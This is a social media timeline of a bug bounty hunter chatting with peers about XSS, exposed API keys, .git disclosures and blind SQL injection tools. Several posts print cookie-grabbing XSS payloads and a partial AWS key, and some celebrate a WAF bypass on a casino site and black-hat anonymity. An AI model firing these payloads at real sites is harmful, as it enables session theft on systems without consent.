Siddhartha S

@sidharthas8962

Followers
1,063
Following
334
Media
57
Statuses
511

Security Researcher

same planet as you
Joined February 2022
Pinned Tweet
@sidharthas8962
Siddhartha S
3 days
Hello everyone, I found 100 of emails of customers by running waybackurls on my target. Now, after visiting the URL, I can send unlimited password reset emails to customers. I reported this to the company, and they didn't consider it. Any tips to increase my severity? #hackingtime
@sidharthas8962
Siddhartha S
3 months
Hello everyone, I have just found an API key in a .js file, but I don't know what kind of API key this is. If you have any idea where I can identify this, please let me know. #Hackingtime #BugBounty
@sidharthas8962
Siddhartha S
10 days
Hello everyone. I have found a stored xss. payload by @coffinxp7 <details x=xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx:2 open ontoggle="prompt(document.cookie);">
@sidharthas8962
Siddhartha S
3 months
Hello everyone, I have again found an Information Disclosure bug on a BBP, hope they reward. #Hackingtime #BugBounty
@sidharthas8962
Siddhartha S
5 months
Today I have found 10+ CORS misconfigurations in 2 websites, with valid video POC and screenshots also. 3 reported. I used an automatic tool and then I checked manually for the video POC. A special thanks to my supportive friend @coffinxp7 #BugBounty #hackers
@sidharthas8962
Siddhartha S
3 months
Mass hunting of CVE-2024-34102. A big thanks to @coffinxp7 for the amazing idea, but I don't know if they are running a bug bounty program or not. Could you please help me? @coffinxp7
@sidharthas8962
Siddhartha S
4 months
Hey everyone, I have found 3 bugs in just 30 minutes. 1. HTML injection 2. HTML injection to open redirection and redirected to CIA.🥰😍 3. Reflected XSS #bugbounty #bugbountytips
@sidharthas8962
Siddhartha S
2 months
Hello everyone, I have found a stored XSS by @coffinxp7 payload.
@sidharthas8962
Siddhartha S
28 days
Hello everyone, during directory brute-forcing on the target subdomain with dirb, I found multiple directories with 200 OK, but when I check manually it gives me error 404 Not Found. I don't know why. If you have any suggestions, let me know. #Hackingtime
@sidharthas8962
Siddhartha S
4 months
Hey @coffinxp7, your XSS payload really worked for me, thanks again for sharing. Let's see what happens next, because the payload fired in a chatbot which is created by the program itself.
@sidharthas8962
Siddhartha S
4 months
I have found an XSS on a BBP. Hey @coffinxp7, your payload is really helpful. I just copied the payload, opened the BBP and pasted the payload; after I hit Enter, the payload fired.
@sidharthas8962
Siddhartha S
4 months
Hey everyone, recently I found a bug. Here are the details: Bug type: sensitive information disclosure. Bounty: 150EUR. Thanks to #bugbounty #Hackingtime
@sidharthas8962
Siddhartha S
3 months
Hello everyone, I have found multiple API key disclosures in a .js file on a BBP. Hope they reward. #Hackingtime #BugBounty
@sidharthas8962
Siddhartha S
5 months
I have found 30+ blind XSS in one website. Almost every parameter is vulnerable to blind XSS. #bugbounty #hackers
@sidharthas8962
Siddhartha S
4 months
Hey everyone, I have found multiple HTML injections in a chat bot. Should I report this? #BugBounty #bugbountytips 1. payload <img src="index.jpg" alt=" @coffinxp in a Jacket" width="1000" height="600">
@sidharthas8962
Siddhartha S
20 days
Hello everyone, I have found a stored XSS via SVG file upload; payload credit to my brother @coffinxp7. #hackingtime Hey @coffinxp7, can you share your favorite image? I want to try like this.
@coffinxp7
Coffin 
4 months
FINALLY I HACKED NASA ! (subdomain) @NASA
@sidharthas8962
Siddhartha S
1 month
Hello everyone, is this causing a bug? It has lots of information. #hackingtime
@sidharthas8962
Siddhartha S
1 month
Hello everyone, I was hunting on a program, and during directory brute-forcing I found a folder like /git/. I opened the domain and found this >> but I don't know what this is. If you have any idea, please let me know.
@sidharthas8962
Siddhartha S
4 months
@Steiner254 @coffinxp7 <iframe srcdoc="<img src=x onerror=alert(999)>"></iframe> /path?next=javascript:top[/al/.source+/ert/.source](document.cookie) login?redirectUrl=javascript%3avar{a%3aonerror}%3d{a%3aalert}%3bthrow%2520document.domain
@sidharthas8962
Siddhartha S
3 months
Hello everyone, recently I submitted a bug to h☆☆☆☆1 but got a duplicate after 3 informational, because this was submitted by another researcher. But I am happy with that. At least I have found a valid bug, I think. #Hackingtime #bugbounty
@sidharthas8962
Siddhartha S
3 months
Hello everyone, I have found an Information Disclosure bug, Index of /.git, but after checking their BB page, they have clearly mentioned that they don't provide bounty for bugs, so I didn't report them. They also have a BBP on Bugcrowd. #Hackingtime #BugBounty
@sidharthas8962
Siddhartha S
26 days
Hello everyone, I have just got a small 50$ bounty for reporting a bug. Bug type > AWS API key disclosure #Hackingtime #bugbounty
@sidharthas8962
Siddhartha S
4 months
Hello everyone, help me to understand this. #bugbountytip @coffinxp7 even my BXSS payload also fired here.
@sidharthas8962
Siddhartha S
5 months
Hello everyone, I have found a file called /.DS_Store via directory brute-forcing. Is this sensitive? Should I report it? #bugbounty #hackers
@sidharthas8962
Siddhartha S
4 months
Update: they replied, "we use a third-party vendor for this msg'ing function so nothing we can do on our side." I agreed with them, because they clearly mention it in their policy. By the way, I have learned a new bug type. #BugBounty #Hackingtime
@sidharthas8962
Siddhartha S
4 months
Hey everyone, I have found multiple HTML injections in a chat bot. Should I report this? #BugBounty #bugbountytips 1. payload <img src="index.jpg" alt=" @coffinxp in a Jacket" width="1000" height="600">
@sidharthas8962
Siddhartha S
3 months
Happy birthday to a mastermind hacker who continuously pushes the boundaries of possibility. May your skills remain sharp, and may you always stay one step ahead. Have an amazing celebration! Keep hacking. "Best wishes for you, as a Security Researcher prospective" @coffinxp7
@sidharthas8962
Siddhartha S
3 months
Hello everyone, I have found REACT_APP_FIREBASE_DEV_API_KEY disclosed in a .js file, but the company said this is not a vulnerability. How can I escalate this, if possible? If you have any idea, please let me know. #Hackingtime #BugBounty
@sidharthas8962
Siddhartha S
3 months
I will never forget the day. We met for the first time on social media and I was completely unaware that you would mean so much to me. @coffinxp7 @hexsh1dow @sidharthas8962
@coffinxp7
Coffin 
3 months
nOne can fix me Expect this
@sidharthas8962
Siddhartha S
1 month
Hello brother @coffinxp7, I tried your BSQLI tool on different websites, and I think it's the best tool for finding BSQLi with automation, but when I visit the vulnerable URL/parameter the WAF is blocking me. Any suggestions?
@sidharthas8962
Siddhartha S
3 months
Great achievement brother. Keep pushing the boundaries of hacking In ethical way. #Longlive @coffinxp7 #lostsec
@coffinxp7
Coffin 
3 months
Thank you so much guys for 10k Family 🎉😇❤️
@sidharthas8962
Siddhartha S
5 months
Recently I was hunting bugs on a private program. When I was analyzing the .js file, I found this: amazon_aws_access_key_id = AkiAknZCcwHAwAusAD98. Is this a bug or not? If it's a bug, then what's the impact of this, and how can I show impact to that program? #bugbounty @coffinxp7 @_anonysm
@sidharthas8962
Siddhartha S
5 months
I was analyzing .js file and found this. If you have any idea please let me know. #BugBounty
@sidharthas8962
Siddhartha S
5 months
Hey @coffinxp7, can you please make a video about CSRF: how to find, report, all about CSRF, and also how I can find CSRF with the XSRFProbe tool?
@sidharthas8962
Siddhartha S
4 months
Hello everyone, I have found a subdomain takeover vulnerability which is vulnerable to helpscout. But I am not able to create an account because of their strict signup process. What should I do? #bugbounty #bugbountytips
@sidharthas8962
Siddhartha S
5 months
@ChetnaP3 var a=document.createElement("script");a.src="";document.body.appendChild(a);
@sidharthas8962
Siddhartha S
4 months
@torik_1999 @coffinxp7 <details x=xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx:2 open ontoggle="prompt(document.cookie);">
@sidharthas8962
Siddhartha S
4 months
Hey @coffinxp7, what color is your Bugatti? I can design in HTML. Let's see some samples; if this is your favorite color, let me know. 😍🥰 #bugbounty #bugbountytips Comment for color change. HTML injection.
@sidharthas8962
Siddhartha S
4 months
Great achievement brother. Keep growing.
@coffinxp7
Coffin 
4 months
created a powerful Blind SQLi tool that detects SQLi with 100% accuracy with 0% false positive issue, uploading soon.. just working on all types of payloads for different DBMS
@sidharthas8962
Siddhartha S
3 months
Hey @coffinxp7 can you please make a video on "mass hunting on remote code execution"
@sidharthas8962
Siddhartha S
23 days
Hey @coffinxp7 show me your Phone wallpaper.
@sidharthas8962
Siddhartha S
5 months
I have found multiple directory listing vulnerabilities leading to disclosure of sensitive information in self-hosted VRPs which are providing bounty for that, but till now no response from the companies. #BugBounty #hackers
@sidharthas8962
Siddhartha S
5 months
I have submitted a bug report to a BBP. The company replied to my mail; here is the screenshot.
@sidharthas8962
Siddhartha S
3 months
Happy to see my brother @coffinxp7 that you have achieved 10k followers on @X Wishing a filled with clandestine operations, encrypted communications, and ingenious exploits to a hacker who walks the line between genius and madness. Celebrate your day in true hacker fashion!
@sidharthas8962
Siddhartha S
3 months
Hey @coffinxp7, how to find IP addresses of all subdomains in one step? Do you have any tool which can find IP addresses from a subdomain file? Please let me know. #bug #hacking
@sidharthas8962
Siddhartha S
3 months
Are you a BlackHat hacker? If yes, then you need to hide your identity forever from the internet, because you have performed multiple cyber attacks and defaced their website/organization. By the way, I love your content and your hacking skills. Keep hacking, keep growing.
@coffinxp7
Coffin 
3 months
This is how much BlackHat Hacker Earns :)
@sidharthas8962
Siddhartha S
9 days
Knock knock FBI FBI They are searching you, by land to land because they can't trace your location.
@coffinxp7
Coffin 
9 days
Malaysia top gambling casino betting site, strong WAF bypassed! But they have no contact email support. What do I do now?
@sidharthas8962
Siddhartha S
4 months
@rhetoric_URBAN </script>'"><img src=x onError=prompt(1)>
@sidharthas8962
Siddhartha S
11 days
Wow, happy to see that I am verified. Without buying premium.
@sidharthas8962
Siddhartha S
3 months
Agreed.
@coffinxp7
Coffin 
3 months
no one is permanent in life, everyone comes for a particular period of time. so enjoy the phase of life & move on
@sidharthas8962
Siddhartha S
4 months
I have gained 100 followers in just 24 hours, Thanks to everyone. #bugbountytip
@sidharthas8962
Siddhartha S
28 days
Don't disappear, brother. FBI needs you for catching cyber criminals.
@coffinxp7
Coffin 
28 days
𝙀𝙫𝙚𝙧𝙮𝙊𝙣𝙚 𝙞𝙨 𝙬𝙤𝙧𝙠𝙞𝙣𝙜 𝙩𝙤 𝙗𝙚 𝙨𝙚𝙚𝙣 𝙄'𝙖𝙢 𝙬𝙤𝙧𝙠𝙞𝙣𝙜 𝙩𝙤 𝘿𝙞𝙨𝙖𝙥𝙥𝙚𝙖𝙧
@sidharthas8962
Siddhartha S
15 days
Congratulations brother.
@coffinxp7
Coffin 
15 days
our latest bug hunting tool is featured in a Recorded Future Insikt research article (threat intel platform), this is crazyy🔥🏆
@sidharthas8962
Siddhartha S
5 months
@kuroOowannafly var a=document.createElement("script");a.src="";document.body.appendChild(a);
@sidharthas8962
Siddhartha S
4 months
Hey @coffinxp7 what is this? I am very disappointed bro.
@sidharthas8962
Siddhartha S
3 months
Once again, wishing a mind-blowing birthday to a hacker whose coding skills are the envy of the digital underworld. May your exploits be celebrated, your systems impenetrable, "and your identity forever hidden in the shadows." Keep hacking like professional. @coffinxp7
@sidharthas8962
Siddhartha S
5 months
Note: always use wpscan if your target website is running on WordPress, to find directory listing bugs and other bugs like theme- and plugin-related ones. Cmd:: wpscan --url --api key -e --random agent -f for force if there is any WAF blocking you...
@sidharthas8962
Siddhartha S
3 months
Hello everyone, again a bug submitted by me got duplicate, because it was reported by another researcher. Feel sad. Why didn't companies patch the bug if they already have information on that bug, or it was submitted by another researcher? #Hackingtime #BugBounty
@sidharthas8962
Siddhartha S
5 months
Hello everyone. I have embedded an XSS payload in a PDF file. When I try to open this file in Firefox or Chrome, the XSS payload is triggered. Is this a bug or not? #bugbounty #hackers @coffinxp7 Kindly help.
@sidharthas8962
Siddhartha S
4 months
@NishanShil72327 /.git/config
@sidharthas8962
Siddhartha S
3 months
Hello Security Team of @recruitlyio, I submitted a bug to you 2 months ago by email. Why haven't you patched the bug, and why didn't you respond? If you don't care about security, then why are you running a bug bounty just to show off that you care about security and user privacy?
@sidharthas8962
Siddhartha S
2 months
Mine is LostSec_007
@coffinxp7
Coffin 
2 months
what's your WIFI name mine is this one :)
@sidharthas8962
Siddhartha S
4 months
@coffinxp7 @Hacker0x01 @ICICIBank @ICICIBank_Care Because they don't care about user data, privacy. I have also found multiple bugs in an Indian private bank, but I didn't receive any response for 15 days.
@sidharthas8962
Siddhartha S
3 months
Hello Team of @Wildix_, I have submitted multiple bug reports to you by email. Kindly patch the bugs as soon as possible, and respond. Sidhartha, Security Researcher
@sidharthas8962
Siddhartha S
3 months
Hello @RunOnFlux, I have submitted a vulnerability report to you by email. Why are you all not responding to researcher mails? If you don't have time to reply to researcher mails, then why are you running a bug bounty program on the internet?
@sidharthas8962
Siddhartha S
2 months
Hello everyone, recently I submitted 4 Information Disclosure bugs to Bugcrowd. Here are the details. 1st: duplicate, submitted by another researcher. 2nd: duplicate, submitted by another researcher. 3rd: not applicable. 4th: not applicable due to no exploit. #Hackingtime #Bugs
@sidharthas8962
Siddhartha S
3 months
Tabahi
@sidharthas8962
Siddhartha S
10 days
@0xchoudhary
Sushil Choudhary
10 days
👀
@sidharthas8962
Siddhartha S
4 months
@pentesterzaman So basically I used the dirb tool for directory brute-forcing and I found /.git/config enabled. I visited the URL and found some information. I reported.
@sidharthas8962
Siddhartha S
3 months
@coffinxp7 @InternetH0F Hope I will join you in future. And do some contribution to hack the scammers.
@sidharthas8962
Siddhartha S
4 months
bxss payload fired here.
@sidharthas8962
Siddhartha S
6 months
I have found my first bug on a private program through @bugcrowd, but it's informational because I am unable to exploit the bug. But I am happy with that.
@sidharthas8962
Siddhartha S
5 months
@coffinxp7 Can you share this template. Please
@sidharthas8962
Siddhartha S
2 months
I will try and share the result with you soon, brother. By the way, thanks for sharing. I know it will be cool..
@coffinxp7
Coffin 
2 months
so finally wait is over i released my customBsqli tool i hope this will help you all in bbp to find timebased sqli..
@sidharthas8962
Siddhartha S
5 months
Hey @IDFCFIRSTBank, I am a security researcher. I have found multiple bugs on your website. How can I report to you, so that you can secure your website/web applications?
@sidharthas8962
Siddhartha S
4 months
and also, this.
@sidharthas8962
Siddhartha S
3 months
Hello @InfoSecComm I have found some bugs on your site, how can I report to you. let me know. #Hackingtime #BugBounty
@sidharthas8962
Siddhartha S
5 months
Hey @immunefi, I am a security researcher. I have found a bug in a bug bounty program which is registered on your platform. I want to submit a report to that program, but I am confused about what type of wallet I need to receive a payment. Kindly respond.
@sidharthas8962
Siddhartha S
2 months
- Physical and mental health concerns: Hunters must prioritize self-care to avoid burnout and health issues. In summary, while bug bounty hunting can be a rewarding career, it comes with significant financial, emotional, and professional challenges also. Photos by @AIatMeta
@sidharthas8962
Siddhartha S
5 months
@_anonysm The power of your subconscious mind. By Dr. Joseph Murphy You should also read this book. My recommendation.
@sidharthas8962
Siddhartha S
3 months
Hello @bugvsecurity, I created an account on and did not receive a verification email. I am unable to login.
@sidharthas8962
Siddhartha S
3 months
@coffinxp7 @hexsh1dow @rinz0h @PortSwigger @github Life is full of this type of people everywhere, don't be sad @coffinxp7. If the team of PortSwigger or GitHub forced you to delete that, then delete it, brother. You have faced takedowns of multiple channels, YT videos and many things.
@sidharthas8962
Siddhartha S
19 days
Hello everyone, this is my first time trying to find SSRF. I have attached the interactsh payload in an SVG and uploaded it into profile pictures, and I don't know the next steps or if it is valid. Please let me know if you have any references. #Hackingtime
@sidharthas8962
Siddhartha S
4 months
Keep hacking..
@coffinxp7
Coffin 
4 months
FINALLY I HACKED NASA ! (subdomain) @NASA
@sidharthas8962
Siddhartha S
6 months
Hello @helpscout, I want to create an account for my web application. But unfortunately I couldn't create an account. Please try to solve my problem as soon as possible. Please @help @helpscout. I am waiting for your response.
@sidharthas8962
Siddhartha S
2 months
*Continuous Learning Required* - Constantly evolving field: Cybersecurity and technology are constantly changing - Significant time and effort required: Hunters must stay up-to-date with the latest tools, techniques, and technologies.
@sidharthas8962
Siddhartha S
2 months
*High Stress Levels* - Pressure to constantly find bugs: Hunters are under pressure to meet program requirements and stay ahead of the competition - Fear of missing out (FOMO): Hunters may feel anxious about missing potential bugs or payouts.
@sidharthas8962
Siddhartha S
5 months
@coffinxp7 That's why I only report to sensitive endpoint like Is this sensitive endpoints or not. Please reply?
@sidharthas8962
Siddhartha S
5 months
WhatsApp will exit india if forced to break the encryption saying, @WhatsApp
@sidharthas8962
Siddhartha S
3 months
@coffinxp7 How to setup this tool?.
@sidharthas8962
Siddhartha S
10 days
@HackenProof You should start giving money for hackers for p5 submission. I hope you understand.
@sidharthas8962
Siddhartha S
3 months
Hello @RunOnFlux I have found a bug on your web-application, how can I report to you.
@sidharthas8962
Siddhartha S
3 months
long live @coffinxp7 #lostsec my favorite.
@sidharthas8962
Siddhartha S
2 months
*Isolation and Solo Work* - Limited social interaction: Bug bounty hunting can be a solo activity - Isolation can lead to feelings of loneliness and disconnection. *Other Disadvantages*
@sidharthas8962
Siddhartha S
2 months
- Long hours and flexible schedule: Hunters may work irregular hours to meet program deadlines - Limited benefits: No traditional employment benefits like health insurance, retirement plans, or paid time off - Legal and ethical risks: Hunters must navigate complex guidelines.
@sidharthas8962
Siddhartha S
5 months
Hello @duocirclellc, I am a security researcher. I have submitted a bug report to you. Why are you not responding to us? Fix the bug and respond.
@sidharthas8962
Siddhartha S
5 months
@tabaahi_ I was also hunting and found a /.htaccess file. Is it a bug or not? Kindly respond, brother.
@sidharthas8962
Siddhartha S
2 months
@coffinxp7 @hexsh1dow Thanks, bro, for helping us.